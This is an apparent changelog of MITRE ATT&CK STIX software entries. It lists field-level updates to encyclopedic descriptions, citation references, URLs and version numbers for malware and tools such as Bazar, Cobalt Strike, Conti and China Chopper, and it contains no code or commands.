| external_references[2]['description'] | Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018. | Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018. |
| external_references[2]['url'] | https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/ | https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside |
| external_references[3]['source_name'] | Proofpoint Azorult July 2018 | Unit42 Azorult Nov 2018 |
| external_references[3]['description'] | Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018. | Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018. |
| external_references[3]['url'] | https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside | https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/ |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| [BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:09:11.516000+00:00 | 2022-10-13 18:56:28.568000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a backdoor used by [Dragonfly](https://attack.mitre.org/groups/G0035). It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly) | [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 02:49:50.902000+00:00 | 2022-10-12 17:18:25.971000+00:00 |
| description | [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a backdoor used by [Dragonfly](https://attack.mitre.org/groups/G0035). It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly) | [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017) |
| external_references[1]['source_name'] | Symantec Dragonfly | Gigamon Berserk Bear October 2021 |
| external_references[1]['description'] | Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016. | Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021. |
| external_references[1]['url'] | http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf | https://vblocalhost.com/uploads/VB2021-Slowik.pdf |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Symantec Dragonfly Sept 2017', 'description': 'Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.', 'url': 'https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers'} | |
| external_references | {'source_name': 'Symantec Dragonfly', 'description': 'Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.', 'url': 'https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments'} |
| Description |
|---|
| [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 18:43:07.613000+00:00 | 2022-10-12 17:29:57.200000+00:00 |
| external_references[1]['source_name'] | Secure List Bad Rabbit | ESET Bad Rabbit |
| external_references[1]['description'] | Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021. | M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021. |
| external_references[1]['url'] | https://securelist.com/bad-rabbit-ransomware/82851/ | https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/ |
| external_references[2]['source_name'] | ESET Bad Rabbit | Secure List Bad Rabbit |
| external_references[2]['description'] | M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021. | Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021. |
| external_references[2]['url'] | https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/ | https://securelist.com/bad-rabbit-ransomware/82851/ |
| Description |
|---|
| [Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://attack.mitre.org/software/S0534) reportedly has ties to [TrickBot](https://attack.mitre.org/software/S0266) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.(Citation: Cybereason Bazar July 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-18 19:43:00.355000+00:00 | 2022-09-29 20:41:20.065000+00:00 |
| external_references[1]['source_name'] | KEGTAP | Team9 |
| external_references[1]['description'] | (Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: CrowdStrike Wizard Spider October 2020) | (Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020) |
| external_references[2]['source_name'] | Team9 | KEGTAP |
| external_references[2]['description'] | (Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020) | (Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: CrowdStrike Wizard Spider October 2020) |
| external_references[5]['source_name'] | CrowdStrike Wizard Spider October 2020 | NCC Group Team9 June 2020 |
| external_references[5]['description'] | Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021. | Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020. |
| external_references[5]['url'] | https://www.crowdstrike.com/blog/wizard-spider-adversary-update/ | https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/ |
| external_references[6]['source_name'] | NCC Group Team9 June 2020 | CrowdStrike Wizard Spider October 2020 |
| external_references[6]['description'] | Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020. | Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021. |
| external_references[6]['url'] | https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/ | https://www.crowdstrike.com/blog/wizard-spider-adversary-update/ |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014.(Citation: Unit 42 Bisonal July 2018) | [Bisonal](https://attack.mitre.org/software/S0268) is a remote access tool (RAT) that has been used by [Tonto Team](https://attack.mitre.org/groups/G0131) against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:05:26.618000+00:00 | 2022-04-18 17:18:36.512000+00:00 |
| description | [Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014.(Citation: Unit 42 Bisonal July 2018) | [Bisonal](https://attack.mitre.org/software/S0268) is a remote access tool (RAT) that has been used by [Tonto Team](https://attack.mitre.org/groups/G0131) against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) |
| external_references[1]['description'] | (Citation: Unit 42 Bisonal July 2018) | (Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) |
| x_mitre_version | 1.2 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Talos Bisonal Mar 2020', 'description': 'Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022.', 'url': 'https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html'} |
| Description |
|---|
| [BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 15:59:03.034000+00:00 | 2022-10-12 17:33:00.482000+00:00 |
| Description |
|---|
| [BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT Wocao December 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 23:23:19.517000+00:00 | 2022-09-27 18:19:01.118000+00:00 |
| external_references[1]['source_name'] | GitHub Bloodhound | FoxIT Wocao December 2019 |
| external_references[1]['description'] | Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019. | Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. |
| external_references[1]['url'] | https://github.com/BloodHoundAD/BloodHound | https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf |
| external_references[3]['source_name'] | FoxIT Wocao December 2019 | GitHub Bloodhound |
| external_references[3]['description'] | Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. | Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019. |
| external_references[3]['url'] | https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf | https://github.com/BloodHoundAD/BloodHound |
| x_mitre_version | 1.1 | 1.3 |
| Description |
|---|
| [BoomBox](https://attack.mitre.org/software/S0635) is a downloader responsible for executing next stage components that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:33:59.932000+00:00 | 2022-01-18 18:10:37.673000+00:00 |
| Description |
|---|
| [Brave Prince](https://attack.mitre.org/software/S0252) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://attack.mitre.org/software/S0249), and was seen along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations surrounding the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-04-21 23:09:30.781000+00:00 | 2022-04-11 21:44:52.220000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 20:26:31.452000+00:00 | 2022-02-10 15:37:37.795000+00:00 |
| Description |
|---|
| [CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 15:21:18.086000+00:00 | 2022-04-14 17:21:52.879000+00:00 |
| external_references[1]['source_name'] | CHOPSTICK | SPLM |
| external_references[1]['description'] | (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) | (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) |
| external_references[2]['source_name'] | Backdoor.SofacyX | Xagent |
| external_references[2]['description'] | (Citation: Symantec APT28 Oct 2018) | (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) |
| external_references[3]['source_name'] | SPLM | X-Agent |
| external_references[4]['source_name'] | Xagent | webhp |
| external_references[4]['description'] | (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) | (Citation: FireEye APT28 January 2017) |
| external_references[5]['source_name'] | X-Agent | CHOPSTICK |
| external_references[5]['description'] | (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) | (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) |
| external_references[6]['source_name'] | webhp | Backdoor.SofacyX |
| external_references[6]['description'] | (Citation: FireEye APT28 January 2017) | (Citation: Symantec APT28 Oct 2018) |
| external_references[7]['source_name'] | FireEye APT28 | ESET Sednit Part 2 |
| external_references[7]['description'] | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. | ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016. |
| external_references[7]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf | http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf |
| external_references[8]['source_name'] | ESET Sednit Part 2 | FireEye APT28 January 2017 |
| external_references[8]['description'] | ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. |
| external_references[8]['url'] | http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf |
| external_references[9]['source_name'] | FireEye APT28 January 2017 | FireEye APT28 |
| external_references[9]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. |
| external_references[9]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf |
| x_mitre_version | 2.1 | 2.2 |
| Description |
|---|
| [CSPY Downloader](https://attack.mitre.org/software/S0527) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://attack.mitre.org/groups/G0094).(Citation: Cybereason Kimsuky November 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-22 13:48:19.728000+00:00 | 2022-10-18 23:14:56.867000+00:00 |
| Description |
|---|
| [China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:30:11.979000+00:00 | 2022-04-15 15:15:51.199000+00:00 |
| external_references[2]['source_name'] | Lee 2013 | CISA AA21-200A APT40 July 2021 |
| external_references[2]['description'] | Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015. | CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html | https://us-cert.cisa.gov/ncas/alerts/aa21-200a |
| external_references[5]['source_name'] | CISA AA21-200A APT40 July 2021 | Lee 2013 |
| external_references[5]['description'] | CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department.. Retrieved August 12, 2021. | Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015. |
| external_references[5]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa21-200a | https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html |
| Description |
|---|
| [Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.(Citation: cobaltstrike manual) In addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: cobaltstrike manual) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 20:08:21.958000+00:00 | 2022-10-12 23:24:12.980000+00:00 |
| external_references[1]['url'] | https://cobaltstrike.com/downloads/csmanual38.pdf | https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf |
| x_mitre_version | 1.7 | 1.9 |
| Description |
|---|
| [ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-12-23 19:34:12.017000+00:00 | 2022-10-18 21:58:12.936000+00:00 |
| external_references[1]['source_name'] | Symantec Waterbug | ESET ComRAT May 2020 |
| external_references[1]['description'] | Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015. | Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020. |
| external_references[1]['url'] | https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1 | https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf |
| external_references[3]['source_name'] | ESET ComRAT May 2020 | Symantec Waterbug |
| external_references[3]['description'] | Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020. | Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015. |
| external_references[3]['url'] | https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf | https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1 |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| [Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 19:41:44.167000+00:00 | 2022-04-25 14:00:00.188000+00:00 |
| Old Description | New Description |
|---|---|
| [Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service that was first observed in December 2019, and has being distributed via [TrickBot](https://attack.mitre.org/software/S0266). It has been used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020) | [Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://attack.mitre.org/software/S0575) has been deployed via [TrickBot](https://attack.mitre.org/software/S0266) and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-21 21:05:27.228000+00:00 | 2022-09-29 16:45:13.038000+00:00 |
| description | [Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service that was first observed in December 2019, and has being distributed via [TrickBot](https://attack.mitre.org/software/S0266). It has been used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020) | [Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://attack.mitre.org/software/S0575) has been deployed via [TrickBot](https://attack.mitre.org/software/S0266) and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020) |
| external_references[2]['source_name'] | Cybereason Conti Jan 2021 | CarbonBlack Conti July 2020 |
| external_references[2]['description'] | Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021. | Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021. |
| external_references[2]['url'] | https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware | https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/ |
| external_references[3]['source_name'] | CarbonBlack Conti July 2020 | Cybleinc Conti January 2020 |
| external_references[3]['description'] | Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021. | Cybleinc. (2021, January 21). Conti Ransomware Resurfaces, Targeting Government & Large Organizations. Retrieved April 13, 2021. |
| external_references[3]['url'] | https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/ | https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/ |
| external_references[4]['source_name'] | Cybleinc Conti January 2020 | Cybereason Conti Jan 2021 |
| external_references[4]['description'] | Cybleinc. (2021, January 21). Conti Ransomware Resurfaces, Targeting Government & Large Organizations. Retrieved April 13, 2021. | Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021. |
